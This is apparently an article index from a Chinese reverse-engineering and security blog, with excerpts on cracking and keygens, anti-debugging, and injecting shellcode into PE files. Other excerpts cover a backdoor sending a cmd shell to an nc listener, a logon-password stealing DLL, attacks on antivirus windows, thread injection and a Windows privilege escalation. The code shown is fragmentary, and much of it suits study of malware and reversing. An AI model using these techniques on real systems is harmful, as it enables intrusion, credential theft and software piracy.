网络安全
小驹
小菜鸟
展开
-
网络安全之_木马新的传播方式
头些天,一同事说有个好玩的样本,今天抽空看了下,比较有意思,留个泡...提供个样本的MD5吧,样本就不提供下载了,免得定我个传播木马罪...MD5:92e72ddc2748fcec67b9d0c3307c77ce软件一运行,弹出输入密码,,怎么样??好奇吧....let's crack it!!!具体过程就不说了,找到关键代码处,其中123456是我随便原创 2011-11-23 12:11:22 · 1353 阅读 · 5 评论 -
精装友情通讯录算法逆向与注册机实现
精装友情通讯录 算法逆向 注册机 c语言 破解 逆向原创 2014-06-19 16:31:46 · 6058 阅读 · 0 评论 -
庖丁解牛破解与注册机编写
庖丁解牛 破解 程序 注册机 逆向原创 2014-06-18 11:37:53 · 7267 阅读 · 0 评论 -
ColorSchemer Studio 2 破解
破解 逆向 算法 密码原创 2014-06-13 15:20:18 · 5530 阅读 · 1 评论 -
360破解大赛crackme分析--之3DES解密附加数据
360 破解大赛 crackme 分析 3DES原创 2014-05-29 11:58:42 · 7820 阅读 · 0 评论 -
SEH反调试的实现与调试
SEH用于反调试或者用于注册码的隐藏时。在没有异常时永远都是错误的注册码,只有当触发异常时,程序才走到注册成功的地方……代码如下:void CSehDlg::RegSuc(){ HWND hWnd = ::GetDlgItem(NULL, IDC_STC_TIP); ::SetWindowText(hWnd, "Success!!");}void CSehDlg::RegFai原创 2014-05-16 17:38:58 · 10298 阅读 · 0 评论 -
FindDllByVad遍历dll文件
vadRoot结构好像中有在sp2系统下有效,在sp3系统下调试时,会在遍历avl树的操作时蓝屏...驱动层:.h/* FindDllByVad.H Author: Last Updated: 2007-07-06 This framework is generated by EasySYS 0.3.0 This template file is c转载 2013-01-09 14:06:13 · 13647 阅读 · 0 评论 -
零管道返回cmdshell
零管道返回cmdshell192.168.139.128为虚拟机的IP地址。实验步骤:1 在虚拟机中开启nc -l -v -p 8888进行监听2. 运行编译好的程序虚拟机就会得到实体机的cmd了....// ZeroPipeBackdoor.cpp : Defines the entry point for the console applicat原创 2012-12-06 14:53:43 · 12217 阅读 · 0 评论 -
窗口攻击大法
窗口攻击大法:现在攻击Xurte, powertool,360等都还有用。。界面:1.窗口失效void CWindowAttackDlg::On_Ok() { // TODO: Add your control notification handler code here // TODO: Add extra validation here DWORD dw原创 2012-12-06 19:38:15 · 12276 阅读 · 0 评论 -
防止对特定的函数下CC断点
防止对特定的函数下CC断点下面是对GetDlgItemText下断的检测方法DWORD WINAPI ThreadProc(LPVOID lpParam){typedef UINT (__stdcall * pGetDlgItemText)(HWND, INT, LPTSTR, INT); //函数指针申明PBYTE pByte = (PBY原创 2012-11-22 13:50:39 · 11263 阅读 · 0 评论 -
TLS中检测断点反调试
TLS原理:通过检测程序入口点处的200字节内是否有下的cc断点,如果有,刚程序退出// TLS_test.cpp : Defines the entry point for the application.//#include "stdafx.h"#include "TLS_test.h"#include #include #pragma comment(linker, "原创 2012-11-21 17:01:12 · 12126 阅读 · 0 评论 -
将shellcode 插入到PE节表的间隔中
将shellcode 插入到PE节表的间隔中// InsertShellCodeToPE.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include #define FILENAME "hello.exe"//自定义的shellcodechar shellcod原创 2012-12-04 09:31:52 · 11357 阅读 · 0 评论 -
增加节表存放shellcode
将shellcode放在PE文件新增的节表中// InsertShellCodeToPE.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include #define FILENAME "hello.exe"//自定义的shellcodechar shellcod原创 2012-12-01 17:16:51 · 12210 阅读 · 0 评论 -
获得系统密码(对windows 7无效)
实现步骤:1. 生成GetInfo.dll2. 将生成的GetInfo.dll作为资源放到GetPwd工程中3. 生成GetInfo.exe4. 运行GetInfo.exe install5. 重启机器,输入密码,进入系统后会得到C:\WINDOWS\System32\getPwdout.txt文件,文件内容为:实现原理:将GetInfo.dll,放在W原创 2012-12-01 14:26:48 · 12313 阅读 · 0 评论 -
API内存搜索引擎(C语言内嵌汇编)
API内存搜索引擎(C语言内嵌汇编)// apisearchEngine.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include DWORD __stdcall GetStrLengthA(char* szName){ _asm { push edi原创 2012-11-17 11:17:02 · 11125 阅读 · 0 评论 -
vc6.0使用vmprotect加壳
介绍两种方式:1. map方式2. sdk方式废话不多说,begin~~~1. map方式首先,要让vc6.0生成工程的map文件,设置方式如下:Alt+F7 ,打开“Project Settings”选项页,选择 C/C++ 选项卡,并在最下面的 Project Options 里面输入:/Zd ,然后要选择 Link 选项卡,在最下面的 Project Opti原创 2012-10-19 09:31:11 · 15827 阅读 · 1 评论 -
GOOGLE的go语言在恶意程序中的使用
转自:http://www.symantec.com/connect/blogs/malware-uses-google-go-language我找到的样本:公司: GalaxyNexusRoot文件版本: 3.02.2011内部名称: GalaxyNxRoot源文件名: GalaxyNxRoot.exe产品名称: GalaxySNxRoot产品版本: 3.02翻译 2012-09-24 11:29:39 · 10188 阅读 · 0 评论 -
多级线程注入穿墙技术
主程序调用loader.dll,运行loader.dll中的sethook安装一个WH_GETMESSAGE的全局钩子,发现notepad进程时,loader.dll在钩子函数中加载Insert.dll,insert.dll会做坏事...下面仅是一些关键代码,不能运行 后果自负...1. 主程序代码:初始化时: // TODO: 在此添加额外的初始化代码 h_Dll = Lo原创 2012-05-10 09:28:10 · 978 阅读 · 0 评论 -
CVE-2014-4113:飓风熊猫(HURRICANE PANDA)Win64bit提权0day漏洞
飓风熊猫被认为是原产于中国、主要针对基础设施公司的先进攻击者。我们知道它们除了拥有0day漏洞外,还有其他的三种本地特权提升漏洞。我们知道飓风熊猫使用的是“ChinaChopper”Webshell,而一旦上传这一Webshell,操作者就可试图提升权限,然后通过各种密码破解工具获得目标访问的合法凭证。本地实验结果使用0sayTest.exe cmd命令后,打开的权限从原来的xiaoju变成了sy翻译 2014-11-09 10:26:37 · 4309 阅读 · 0 评论